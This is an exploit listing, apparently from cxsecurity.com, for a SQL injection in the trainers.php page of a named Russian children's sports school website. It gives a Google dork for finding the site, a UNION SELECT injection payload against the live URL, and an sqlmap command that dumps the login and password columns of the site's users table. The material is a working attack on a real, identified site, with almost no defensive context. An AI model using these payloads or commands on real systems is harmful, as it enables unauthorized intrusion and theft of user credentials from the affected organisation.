МБОУДО СДЮСШОР № 7 «Акробат» SQL İnjection

2019.05.15
tr Cerkuday (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[*] Exploit Title:МБОУДО СДЮСШОР № 7 «Акробат» SQL İnjection ----------------------------------------------------------------------------- Google Dork :intitle:МБОУДО СДЮСШОР № 7 «Акробат» trainers.php?id=3 ----------------------------------------------------------------------------- Date:15.05.2019 ----------------------------------------------------------------------------- Exploit Author:Cerkuday ----------------------------------------------------------------------------- [*] Tested on: Windows 10 / Kali Linux [*] Demo: http://www.acrobat-tlt.ru/trainers.php?id=3 Poc http://www.acrobat-tlt.ru/trainers.php?id=-6209' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176767671,0x7353694e4867516746665161515a616f784d704b67676267566b68557550517462424c4569686566,0x7171787071),NULL-- RnQo sqlmap.py -u "http://www.acrobat-tlt.ru/trainers.php?id=3" --random-agent -D acrobattlt -T users -C login,password --dump


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top